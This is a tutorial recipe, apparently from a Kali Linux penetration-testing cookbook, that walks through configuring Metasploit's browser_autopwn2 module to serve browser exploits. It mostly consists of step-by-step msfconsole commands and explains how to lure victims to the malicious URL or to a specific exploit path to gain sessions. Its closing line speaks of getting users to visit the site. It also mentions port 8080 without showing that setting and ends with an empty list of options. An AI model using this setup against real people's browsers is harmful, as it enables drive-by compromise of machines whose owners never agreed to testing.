Metasploit Framework includes a huge collection of client-side exploits, many of them are meant to exploit known vulnerabilities in web browsers and there is a module that has the ability to detect the version of browser the client is using and picks the best exploit to trigger, this module is browser_autopwn or browser_autopwn2, in its newest version.
In this recipe, we will set up an attack with browser_autopwn2 and get it ready for a victim to come in.
- Start msfconsole.
- We will use version 2 of Browser Autopwn (BAP2):
use auxiliary/server/browser_autopwn2 - Let's take a look at what configurable options it has:
show options
- We will set our Kali server to receive connections:
set SRVHOST 192.168.56.1 - Then, we will create a path
/kittensfor the server to respond to:set URIPATH /kittens - This module triggers a multitude of exploits, including some for Android; suppose we are setting up an attack with PCs as targets and don't want to depend on the authorization of Adobe Flash, we will exclude the Android and Flash exploits:
set EXCLUDE_PATTERN android|adobe_flash - We will also set an advanced option (use
show advancedto view the full list of advanced options) for the module to show us the individual path of each exploit launched and be more verbose.set ShowExploitList true set VERBOSE true
Advanced options also allow us to choose the payload and its parameters, such as LHOST and LPORT, for each platform (Windows, Unix, and Android)
- Now, we are ready to run the exploit:
run
If we want to trigger a particular exploit, we may use the Path value after our server's URL; for example, if we want the firefox_svg_plugin to trigger, we send
http://192.168.56.1/PWrmfJApkwWsfto the victim; paths are generated randomly each time the module runs. - In a client's browser, if we go to
http://192.168.56.1/kittens, we will see BAP2 respond immediately and try all fitting exploits, and when it successfully executes one, it creates a session in the background:
Browser Autopwn sets up a web server with a main page that uses JavaScript to identify what software the client is running and based on that choose what exploit to try with it.
In this recipe, we set our Kali machine to listen on port 8080 for requests to the kittens directory. Other options we configured were:
After that, we just need to run the module and make some users to come to our /kittens site.